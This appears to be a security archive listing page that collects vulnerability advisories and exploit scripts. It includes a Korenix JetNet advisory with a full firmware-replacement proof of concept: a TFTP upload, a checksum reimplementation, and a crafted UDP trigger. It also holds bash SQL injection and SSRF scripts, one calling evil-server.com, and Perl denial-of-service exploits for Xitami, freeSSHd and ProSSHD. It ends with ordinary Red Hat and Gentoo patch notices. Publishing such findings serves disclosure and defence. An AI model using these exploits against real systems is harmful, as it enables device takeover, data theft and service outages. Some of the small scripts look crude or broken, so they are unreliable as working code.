Korenix JetNet Series allows TFTP without authentication and also allows for unauthenticated firmware upgrades.

    CyberDanube Security Research 20240109-0-------------------------------------------------------------------------------                title| Multiple Vulnerabilities              product| Korenix JetNet Series   vulnerable version| See "Vulnerable versions"        fixed version| -           CVE number| CVE-2023-5376, CVE-2023-5347               impact| High             homepage| https://www.korenix.com/                found| 2023-08-31                   by| S. Dietz (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"Korenix Technology, a Beijer group company within the Industrial Communicationbusiness area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.With decades of experiences in the industry, we have developed various productlines [...].Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customerbase covers different Sales channels, including end-customers, OEMs, systemintegrators, and brand label partners. [...]"Source: https://www.korenix.com/en/about/index.aspx?kind=3Vulnerable versions-------------------------------------------------------------------------------Tested on emulated Korenix JetNet 5310G / v2.6All vulnerable models/versions according to vendor:JetNet 4508 (4508i-w V1.3, 4508 V2.3, 4508-w V2.3)JetNet 4508f, 4508if (4508if-s V1.3,4508if-m V1.3, 4508if-sw V1.3,       4508if-mw V1.3, 4508f-m V2.3, 4508f-s V2.3, 4508f-mw V2.3,       4508f-sw V2.3)JetNet 5620G-4C V1.1JetNet 5612GP-4F V1.2JetNet 5612G-4F V1.2JetNet 5728G (5728G-24P-AC-2DC-US V2.1, 5728G-24P-AC-2DC-EU V2.0)JetNet 528Gf (6528Gf-2AC-EU V1.0, 6528Gf-2AC-US V1.0, 6528Gf-2DC24 V1.0,       6528Gf-2DC48 V1.0, 6528Gf-AC-EU V1.0, 6528Gf-AC-US V1.0)JetNet 6628XP-4F-US V1.1JetNet 6628X-4F-EU V1.0JetNet 6728G (6728G-24P-AC-2DC-US V1.1, 6728G-24P-AC-2DC-EU V1.1)JetNet 6828Gf (6828Gf-2DC48 V1.0, 6828Gf-2DC24 V1.0, 6828Gf-AC-DC24-US V1.0,       6828Gf-2AC-US V1.0, 6828Gf-AC-US V1.0, 6828Gf-2AC-AU V1.0,       6828Gf-AC-DC24-EU V1.0, 6828Gf-2AC-EU V1.0)JetNet 6910G-M12 HVDC V1.0JetNet 7310G-V2 2.0JetNet 7628XP-4F-US V1.0, 7628XP-4F-US V1.1, 7628XP-4F-EU V1.0,       7628XP-4F-EU V1.1JetNet 7628X-4F-US V1.0, 7628X-4F-EU V1.0JetNet 7714G-M12 HVDC V1.0Vulnerability overview-------------------------------------------------------------------------------1) TFTP Without Authentication (CVE-2023-5376)The available tftp service is accessable without user authentication. Thisallows the user to upload and download files to the restricted "/home" folder.2) Unauthenticated Firmware Upgrade (CVE-2023-5347)A critical security vulnerability has been identified that may allow anunauthenticated attacker to compromise the integrity of a device or cause adenial of service (DoS) condition. This vulnerability resides in the firmwareupgrade process of the affected system.Proof of Concept-------------------------------------------------------------------------------1) TFTP Without Authentication (CVE-2023-5376)The Linux tftp client was used to upload a firmware to the absolute path"/home/firmware.bin":# tftp $IPtftp> put exploit.bin /home/firmware.binSent 5520766 bytes in 5.7 seconds2) Unauthenticated Firmware Upgrade (CVE-2023-5347)Unauthenticated attackers can exploit this by uploading malicious firmware viaTFTP and initializing the upgrade process with a crafted UDP packet on port5010.We came to the conclusion that the firmware image consists of multiplesections. Our interpretation of these can be seen below:===============================================================================class FirmwarePart:    def init(self, name, offset, size):        self.name = name        self.offset = offset        self.size = sizefirmware_parts = [    FirmwarePart("uimage_header", 0x0, 0x40),    FirmwarePart("uimage_kernel", 0x40, 0x3c54),    FirmwarePart("gzip", 0x3c94, 0x14a000 - 0x3c94),    FirmwarePart("squashfs", 0x14a000, 0x539000 - 0x14a000),    FirmwarePart("metadata", 0x539000, 5480448 - 0x539000),]===============================================================================The squashfs includes the rootfs. Metadata includes a 4 byte checksum whichneeds to be modified when repacked. During our analysis we observed that thechecksum gets calculated over all sections except metadata. To test thisvulnerability we reimplemented the checksum calculation at offset 0x9bdc inthe binary "/bin/cmd-server2":===============================================================================#include <stdio.h>#include <stdint.h>#include <stdlib.h>int32_t check_file(const char* arg1) {    FILE* r0 = fopen(arg1, "rb");    if (!r0) {        return 0xffffffff;    }    int32_t filechecksum = 0;    int32_t last_data_size = 0;    int32_t file_size = 0;    uint8_t data_buf[4096];    int32_t data_len = 1;    while (data_len > 0) {        data_len = fread(data_buf, 1, sizeof(data_buf), r0);        if (data_len == 0) {            break;        }        int32_t counter = 0;        while (counter < (data_len >> 2)) {            int32_t byte_at_counter = *((int32_t*)(data_buf + (counter << 2)));            counter++;            filechecksum += byte_at_counter;        }        file_size += data_len;        last_data_size = data_len;    }    fclose(r0);    if (last_data_size < 0x400 || (last_data_size >= 0x400 && (file_size - 0x14a  000) > 0x5ac000)) {        return 0xffffffff;    }    data_len = 0;    while (data_len < (last_data_size >> 2)) {        int32_t r3_2 = *((int32_t*)(data_buf + (data_len << 2)));        data_len++;        filechecksum -= r3_2;    }    return filechecksum;}int main(int argc, char* argv[]) {    if (argc != 2) {        printf("Usage: %s <file_path>\n", argv[0]);        return 1;    }    int32_t result = check_file(argv[1]);    printf("0x%x\n", result);    return 0;}===============================================================================After modifying and repacking the squashfs, we calculated the checksum,patched the required bytes in the metadata section (offset 0x11b-0x11e) andinitilized the update process.===============================================================================# tftp $IPtftp> put exploit.bin /home/firmware.binSent 5520766 bytes in 5.7 seconds# echo -e "\x00\x00\x00\x1f\x00\x00\x00\x01\x01" | nc -u $IP 5010===============================================================================The output of the serial console can be observed below:===============================================================================Jan  1 00:01:00 Jan  1 00:01:00 syslog: UDP cmd is receivedJan  1 00:01:00 Jan  1 00:01:00 syslog: management vlan = sw0.0Jan  1 00:01:00 Jan  1 00:01:00 syslog: setsockopt(SO_BINDTODEVICE) No such deviJan  1 00:01:00 Jan  1 00:01:00 syslog: tlv_count = 0Jan  1 00:01:00 Jan  1 00:01:00 syslog: rec_bytes = 10Jan  1 00:01:00 Jan  1 00:01:00 syslog: command TLV_FW_UPGRADE receivedcheck firmware...checksum=b2256313, inFileChecksum=b2256313Firmware upgrading, don't turn off the switch!Begin erasing flash:.Write firmware.bin (5480448 Bytes) to flash:...Write finished...Terminating child processes...Jan  1 00:01:01 Jan  1 00:01:01 syslog: first time create tlv_chainJan  1 00:01:01 syslogd exitingFirmware upgrade success!!waiting for reboot command .......===============================================================================The vulnerabilities were manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------Beijer/Korenix provided a workaround to mitigate the vulnerabilities until aproper patch is available (see "Workaround" section).Workaround-------------------------------------------------------------------------------Beijer representatives provided the following workaround for mitigating thevulnerabilities on devices of the JetNet series:"Login by terminal:Switch# configure terminalSwitch(config)# service ipscan disableSwitch(config)# tftpd disableSwitch(config)# copy running-config startup-config"Source: https://www.beijerelectronics.com/en/support/Help___online?docId=69947This commands should be used to deactivate the TFTP daemon on the device toprevent unauthenticated actors from abusing the service.Recommendation-------------------------------------------------------------------------------Regardless to the current state of the vulnerability, CyberDanube recommendscustomers from Korenix to upgrade the firmware to the latest version available.Furthermore, a full security review by professionals is recommended.Contact Timeline-------------------------------------------------------------------------------31-08-2023: Contacting Beijer Electronics Group via cs@beijerelectronics.com.31-08-2023: Receiving contact information. Send vulnerability information.26-09-2023: Asking about vulnerability status and receiving update release date.27-10-2023: Received update from contact regarding the firmware update.29-11-2023: Meeting with contact stating that it effects the whole series.31-11-2023: Meeting to discuss potential solutions.11-12-2023: Release delayed due to lack of workaround from manufacturer.21-12-2023: Manufacturer provides workaround. Release date confirmed.09-01-2024: Coordinated release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF Sebastian Dietz / @2024

Korenix JetNet Series Unauthenticated Access

WordPress RSVPMaker plugin versions 9.3.2 and below suffer from a remote SQL injection vulnerability.

    #!/bin/bash# Set the URL of the website running the vulnerable pluginurl="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php"# Set the number of columns in the querycolumns=5response=$(curl -s "$url")query=$(echo "$response" | grep -oP 'FROM .* WHERE .*')payload="' UNION SELECT 1,2,3,4,5-- "# Test the query with different numbers of columnsfor i in $(seq 1 $columns)do  query_with_payload="${query%?*}?${payload:0:i}${query#*?}"  curl -s -X POST -d "$query_with_payload" "$url" | grep -q "Wordfence Security Error"  if [ $? -eq 0 ]  then    echo "Vulnerability confirmed with $i columns"    break  fidone

WordPress RSVPMaker 9.3.2 SQL Injection

Taokeyun versions up to 1.0.5 suffers from a remote SQL injection vulnerability.

Change Mirror Download

    #!/bin/bash# Variablesurl="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php"cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -"# Construct the requestrequest="POST $url HTTP/1.1\r\n"request+="Content-Type: application/x-www-form-urlencoded\r\n"request+="Content-Length: $((${#cid}+15))\r\n\r\n"request+="$cid"# Send the request(echo -e "$request") | nc example.com 80

Taokeyun SQL Injection

HaoKeKeJi YiQiNiu versions up to 3.1 suffer from a server-side request forgery vulnerability.

    #!/bin/bash# Set target URL and payloadtarget_url="http://example.com/application/pay/controller/Api.php"payload="url=http://evil-server.com/exploit"# Send the malicious requestresponse=$(curl -s -X POST -d "$payload" "$target_url")# Check if the exploit was successfulif echo "$response" | grep -q "Exploit successful"; then    echo "Exploit succeeded"else    echo "Exploit failed"fi# Example payload and responsepayload="url=http://evil-server.com/exploit"response="HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Mon, 01 Dec 2024 20:23:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 25Connection: keep-aliveExploit successful"

HaoKeKeJi YiQiNiu Server-Side Request Forgery

Xitami version 2.5 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Xitami 2.5 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 14 january 2024  
# Vendor Homepage: https://imatix-legacy.github.io/xitami.com/  
# Download to demo: https://drive.google.com/file/d/1Uw9fCQ9T3IBqn53pS2lETUCM6zzYDSb8/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Xitami 2.5   
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=tutFcL3Gh8I

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to webserver.  
#The following request sends a large amount of data to the webserver to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

    $exploit  = "A"*939;

if ($socket = IO::Socket::INET->new  
   (PeerAddr => $ip,  
   PeerPort => $port,   
   Proto => "TCP"))

       {   
    $header =  
    "GET / HTTP/1.1\r\n".  
    "Host: ".$target." \r\n".  
    "If-Modified-Since: AAAAAAAAAAAAA "." $exploit\r\n";

    print $socket $header."\r\n";  
    sleep(1);  
    close($socket);  
    }

else  
  {  
  print "[-] Connection to $target failed!\n";  
  } 

            print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

     _________  
    |         |  
    | Exploit |==( )    //////  
    |_________|   |||   | o o|                   
                    ||| ( c  )                  ____  
                     ||| \= /                  ||   \_  
                      ||||||                   ||     |  
                      ||||||                ...||__/|-"  
                      ||||||             __|________|__  
                        |||             |______________|  
                        |||             || ||      || ||  
                        |||             || ||      || ||  
      ------------|||-------------||-||------||-||-------  
                        |__>            || ||      || ||          

                              [+] Xitami 2.5 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Xitami 2.5 Denial Of Service

Whitepaper called How To Install And Use Metasploit On Termux. Written in Arabic.

How To Install And Use Metasploit On Termux

freeSSHd version 1.0.9 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket;

# Exploit Title: freeSSHd 1.0.9 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 13 january 2024  
# Vendor Homepage:  N/A  
# Download to demo:   
# Notification vendor: No reported  
# Tested Version: freeSSHd 1.0.9 - Denial of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: 

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The SSH does not correctly handle the amount of data or bytes sent.  
#When authenticating to the SSH with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

my $bufff =  
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"x18;

    my $payload =  
      "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" .  
      "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" .  
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde".("A" x 1067);

    $payload .= $payload;  
    $payload .= "C" x 19021 . "\r\n";

my $i=0;  
while ($i<=18) {  
    my $sock = IO::Socket::INET->new(  
        PeerAddr => $ip,  
        PeerPort => $port,  
        Proto    => 'tcp'  
    ) or die "Cannot connect!\n";

    if (<$sock> eq '') {  
    print "[+] Done - Exploited success!!!!!\n\n";  
    exit;  
    }

    $sock->send($payload) or die "Exploited successuful!!!";

$i++;  
}

     sub intro {  
      print q {

                            _/|       
                           // o\      
                           || ._)    
                           //__\     
                           )___(   

      [+] freeSSHd 1.0.9 - Denied of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

freeSSHd 1.0.9 Denial Of Service

ProSSHD version 1.2 20090726 remote denial of service exploit.

    #!/usr/bin/perluse Net::SSH2# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 13 january 2024# Vendor Homepage: https://prosshd.com/# Notification vendor: No reported# Tested Version: ProSSHD 1.2 20090726# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server did not properly handle request with large amounts of data to SSH.#The following request sends a large amount of data to the SSH to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {s      $cmd="clear";    }    system("$cmd");        intro();    main();print "\t    ==> Connecting to webserver... \n\n";sleep(1);my $i=0;    print "\t    ==> Exploiting... \n\n";my $payload  = "\x41" x 500;$connection2 = Net::SSH2->new();$connection2->connect($host, $port) || die "\nError: Connection Refused!\n";$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";$scpget = $connection2->scp_get($payload);$connection2->disconnect();print "\t    ==> Done! Exploited!";   sub intro {      print q {                              ,--,                       _ ___/ /\|                   ,;'( )__, )  ~                  //  //   '--;                   '   \     | ^                       ^    ^      [+] ProSSHD 1.2 20090726 - Denial of Service (DoS)      [*] Coded by Fernando Mengali      [@] e-mail: fernando.mengalli@gmail.com      }  }  sub main {our ($ip, $port, $username, $password) = @ARGV;      unless (defined($ip) && defined($port)) {        print "\n\tUsage: $0 <ip> <port> <username> <password>           \n";        exit(-1);      }  }#3. Solution/ How to fix:# This version product is deprecated

ProSSHD 1.2 20090726 Denial Of Service

Red Hat Security Advisory 2024-0208-03 - An update for openssl is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0208.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Low: openssl security update  
Advisory ID:        RHSA-2024:0208-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0208  
Issue date:         2024-01-12  
Revision:           03  
CVE Names:          CVE-2023-3446  
====================================================================

Summary: 

An update for openssl is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.

Security Fix(es):

* openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446)

* OpenSSL: Excessive time spent checking DH q parameter value (CVE-2023-3817)

* openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (CVE-2023-5678)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* openssl: Excessive time spent checking DH q parameter value (JIRA:RHEL-14237)

* openssl: Excessive time spent checking DH keys and parameters (JIRA:RHEL-14243)

* openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (JIRA:RHEL-16536)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-3446

References:

https://access.redhat.com/security/updates/classification/#low  
https://bugzilla.redhat.com/show_bug.cgi?id=2224962  
https://bugzilla.redhat.com/show_bug.cgi?id=2227852  
https://bugzilla.redhat.com/show_bug.cgi?id=2248616

Red Hat Security Advisory 2024-0208-03

Gentoo Linux Security Advisory 202401-16 - Multiple vulnerabilities have been discovered in FreeRDP, the worst of which could result in code execution. Versions greater than or equal to 2.11.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: FreeRDP: Multiple Vulnerabilities  
     Date: January 12, 2024  
     Bugs: #881525, #918546  
       ID: 202401-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in FreeRDP, the worst of  
which could result in code execution.

Background  
=========  
FreeRDP is a free implementation of the remote desktop protocol.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-misc/freerdp  < 2.11.0      >= 2.11.0

Description  
==========  
Multiple vulnerabilities have been discovered in FreeRDP. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All FreeRDP users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/freerdp-2.11.0"

References  
=========  
[ 1 ] CVE-2022-39316  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39316  
[ 2 ] CVE-2022-39317  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39317  
[ 3 ] CVE-2022-39318  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39318  
[ 4 ] CVE-2022-39319  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39319  
[ 5 ] CVE-2022-39320  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39320  
[ 6 ] CVE-2022-39347  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39347  
[ 7 ] CVE-2022-41877  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41877  
[ 8 ] CVE-2023-39350  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39350  
[ 9 ] CVE-2023-39351  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39351  
[ 10 ] CVE-2023-39352  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39352  
[ 11 ] CVE-2023-39353  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39353  
[ 12 ] CVE-2023-39354  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39354  
[ 13 ] CVE-2023-39355  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39355  
[ 14 ] CVE-2023-39356  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39356  
[ 15 ] CVE-2023-40181  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40181  
[ 16 ] CVE-2023-40186  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40186  
[ 17 ] CVE-2023-40187  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40187  
[ 18 ] CVE-2023-40188  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40188  
[ 19 ] CVE-2023-40567  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40567  
[ 20 ] CVE-2023-40569  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40569  
[ 21 ] CVE-2023-40574  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40574  
[ 22 ] CVE-2023-40575  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40575  
[ 23 ] CVE-2023-40576  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40576  
[ 24 ] CVE-2023-40589  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40589

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-16

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5